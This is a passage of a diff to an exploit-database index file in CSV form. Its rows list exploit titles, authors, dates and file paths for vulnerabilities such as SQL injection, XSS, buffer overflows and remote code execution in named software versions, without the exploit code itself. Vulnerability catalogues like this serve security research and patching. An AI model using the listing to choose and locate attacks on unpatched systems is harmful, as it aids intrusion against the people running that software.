Vulnerability",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 -29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 -29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload Vulnerability",2013-10-24,"Byakuya Kouta",php,webapps,0 -29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injection Vulnerabilities",2006-11-21,"laurent gaffie",asp,webapps,0 -29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 -29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 -29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.PHP SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 -29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 -29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 -29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability",2006-11-21,"Teemu Salmela",linux,remote,0 +34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - (.plf) Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Vulnerability",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting Vulnerability",2006-11-21,the_Edit0r,php,webapps,0 +29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 Result Parameter Cross-Site Scripting Vulnerability",2006-12-02,Detefix,php,webapps,0 +29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 Link_Temp.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 +29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 +29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 Sistemi Uye_giris_islem.ASP SQL Injection Vulnerability",2006-12-04,ShaFuck31,asp,webapps,0 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 & 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption Vulnerability",2013-10-24,"Arash Allebrahim",windows,dos,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 - 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0 +29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow Vulnerability",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability",2006-11-22,"Michal Bucko",windows,dos,0 @@ -26176,23 +26236,19 @@ id,file,description,date,author,platform,type,port 29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 _404_not_found.page.php Multiple Parameter XSS",2006-11-16,"lotto fischer",php,webapps,0 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 _410_stats_gone.page.php app_name Parameter XSS",2006-11-16,"lotto fischer",php,webapps,0 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 _referer_spam.page.php Multiple Parameter XSS",2006-11-16,"lotto fischer",php,webapps,0 -29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption Vulnerability",2006-11-29,LMH,osx,local,0 +29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption Vulnerability",2006-11-29,LMH,osx,local,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.PHP SQL Injection Vulnerability",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.PHP Cross-Site Scripting Vulnerability",2006-11-30,blueshisha,php,webapps,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability",2006-12-01,kcope,netbsd_x86,dos,0 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.PHP IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0 +29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure Vulnerability.",2013-10-28,"Sebastián Magof",hardware,webapps,0 29207,platforms/php/webapps/29207.txt,"deV!Lz Clanportal 1.3.6 Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0 +29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0 +29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 +29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 +29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,metasploit,php,remote,80 -29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - CSRF File Upload Vulnerability",2013-10-26,"Byakuya Kouta",php,webapps,0 -29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 -29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Include Vulnerabilities",2006-12-27,Shell,php,webapps,0 -29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 -29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 Result Parameter Cross-Site Scripting Vulnerability",2006-12-02,Detefix,php,webapps,0 -29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 Link_Temp.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 -29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 -29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 Sistemi Uye_giris_islem.ASP SQL Injection Vulnerability",2006-12-04,ShaFuck31,asp,webapps,0 -29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 Admin.PL Cross-Site Scripting Vulnerability",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 -29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x Spellwin.PHP Cross-Site Scripting Vulnerability",2006-12-04,"En Douli",php,webapps,0 +29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow Vulnerability",2006-12-06,"Andrew Christensen",windows,remote,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.PHP Cross-Site Scripting Vulnerability",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 Index.ASP SQL Injection Vulnerability",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile up.php Taaa Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 @@ -26200,11 +26256,7 @@ id,file,description,date,author,platform,type,port 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 vf_info.asp StrMes Parameter XSS",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 vf_newtopic.asp IFRAME Element XSS",2006-12-04,St@rExT,asp,webapps,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability",2006-12-05,"Juan Pablo Lopez",windows,dos,0 -29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow Vulnerability",2006-12-06,"Andrew Christensen",windows,remote,0 -29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0 -29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 -29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 -29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 +29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Remote Arbitrary File Deletion Vulnerability",2013-11-01,LiquidWorm,php,webapps,0 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7.0 CSS Width Element Denial of Service Vulnerability",2006-12-06,xiam.core,windows,dos,0 29237,platforms/php/webapps/29237.txt,"CPanel 11 BoxTrapper Manage.HTML Cross-Site Scripting Vulnerability",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 @@ -26225,8 +26277,9 @@ id,file,description,date,author,platform,type,port 29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 voirannonce.php no Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 index.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 galeries.inc.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 29258,platforms/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",php,webapps,0 -29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure Vulnerability.",2013-10-28,"Sebastin Magof",hardware,webapps,0 +29273,platforms/hardware/remote/29273.pl,"WatchGuard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - (.plf) Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -26237,13 +26290,6 @@ id,file,description,date,author,platform,type,port 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c Module Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM Login.ASP SQL Injection Vulnerability",2006-12-09,ajann,asp,webapps,0 29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting Vulnerability",2006-12-11,Nicokiller,php,webapps,0 -29273,platforms/hardware/remote/29273.pl,"WatchGuard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 -29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 -29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 -29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection Vulnerability",2006-12-11,ajann,asp,webapps,0 -29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 -29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.PHP Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 -29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0 29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 @@ -26255,7 +26301,6 @@ id,file,description,date,author,platform,type,port 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0 29290,platforms/linux/remote/29290.c,"Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80 -29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastin Magof",windows,webapps,0 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability",2006-12-18,shinnai,windows,dos,0 @@ -26268,6 +26313,7 @@ id,file,description,date,author,platform,type,port 29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 Source Code Information Disclosure Vulnerability",2006-12-20,jose.palanco,linux,remote,0 29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 HTM2PHP.PHP Directory Traversal Vulnerability",2006-11-08,"the master",php,webapps,0 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection Vulnerability",2006-12-20,"Philippe C. Caturegli",php,webapps,0 +29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29305,platforms/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow Vulnerability",2006-12-22,"Umesh Wanve",multiple,dos,0 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 Unspecified Cross-Site Scripting Vulnerability",2006-12-22,Fukumori,php,webapps,0 29307,platforms/windows/dos/29307.c,"Softmaker Office 2012 - TextMaker Memory Corruption Vulnerability",2013-10-30,"Arash Allebrahim",windows,dos,0 @@ -26279,6 +26325,8 @@ id,file,description,date,author,platform,type,port 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 29316,platforms/php/remote/29316.py,"Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)",2013-10-31,noptrix,php,remote,0 +29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80 @@ -26288,8 +26336,10 @@ id,file,description,date,author,platform,type,port 29324,platforms/linux/remote/29324.rb,"Moodle Remote Command Execution",2013-10-31,metasploit,linux,remote,80 29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,metasploit,php,remote,80 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 -29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 -29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Remote Arbitrary File Deletion Vulnerability",2013-11-01,LiquidWorm,php,webapps,0 +30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 +30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 +30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 comersus_customerAuthenticateForm.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 +30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow Vulnerability",2007-06-12,"Cody Pierce",linux,remote,0 29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes 1.0 - Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 @@ -26313,7 +26363,11 @@ id,file,description,date,author,platform,type,port 29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 include/class.search_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 include/class.lib_indexer_universal_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 include/class.layout_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 Archive.PHP SQL Injection Vulnerability",2007-01-02,"Javor Ninov",php,webapps,0 +29376,platforms/php/webapps/29376.txt,"VCard Pro GBrowse.PHP Cross-Site Scripting Vulnerability",2007-01-02,exexp,php,webapps,0 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 +29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 FTP URI Remote Denial of Service Vulnerability",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 +29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 File Mailer Login SQL Injection Vulnerability",2007-01-16,CorryL,php,webapps,0 29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x Template.PHP HTML Injection Vulnerability",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C FolderManager.ASPX Directory Traversal Vulnerability",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26333,8 +26387,6 @@ id,file,description,date,author,platform,type,port 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.DLL Local Privilege Escalation Vulnerability",2007-01-01,"Matousec Transparent security",windows,local,0 -29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 Archive.PHP SQL Injection Vulnerability",2007-01-02,"Javor Ninov",php,webapps,0 -29376,platforms/php/webapps/29376.txt,"VCard Pro GBrowse.PHP Cross-Site Scripting Vulnerability",2007-01-02,exexp,php,webapps,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 ashop/catalogue.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 ashop/basket.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 ashop/search.php searchstring Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 @@ -26345,6 +26397,8 @@ id,file,description,date,author,platform,type,port 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - Search.ASP Cross-Site Scripting Vulnerability",2007-01-05,ShaFuck31,php,webapps,0 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download Down.ASP SQL Injection Vulnerability",2007-01-05,ShaFuck31,asp,webapps,0 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - (SEH) Buffer Overflow PoC",2013-11-03,"Mike Czumak",windows,dos,0 +29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0 +29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 @@ -26414,7 +26468,13 @@ id,file,description,date,author,platform,type,port 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 Logon.aspx SessionID Parameter XSS",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 Members1.aspx Multiple Parameter XSS",2007-01-15,Doz,asp,webapps,0 29458,platforms/linux/dos/29458.txt,"Libgtop2 Library Local Buffer Overflow Vulnerability",2007-01-15,"Liu Qishuai",linux,dos,0 +29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80 +29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 upgrade.php gateway Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 suggest_category.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 user_detail.php u Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 tell_friend.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 WebCore Remote Denial of Service Vulnerability",2007-01-15,"Tom Ferris",osx,dos,0 +29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional WSFTPURL.EXE Local Memory Corruption Vulnerability",2007-01-15,LMH,windows,dos,0 29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 AdminLien.PHP Security Restriction Bypass Vulnerability",2007-01-15,sn0oPy,php,webapps,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation Vulnerability",2007-01-15,"Matousec Transparent security",windows,local,0 @@ -26425,15 +26485,6 @@ id,file,description,date,author,platform,type,port 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 Unsupported Address Family Remote Denial of Service Vulnerability",2007-01-15,anonymous,linux,dos,0 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection Vulnerability",2007-11-16,"Collin Mulliner",linux,remote,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-01-16,"Jesper Jurcenoks",php,webapps,0 -29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 FTP URI Remote Denial of Service Vulnerability",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 -29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 File Mailer Login SQL Injection Vulnerability",2007-01-16,CorryL,php,webapps,0 -29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0 -29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 -29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 upgrade.php gateway Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 suggest_category.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 user_detail.php u Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 tell_friend.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload Vulnerability",2013-11-07,link_satisi,php,webapps,0 29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 send_pwd.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26459,12 +26510,53 @@ id,file,description,date,author,platform,type,port 29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.PHP Cross-Site Scripting 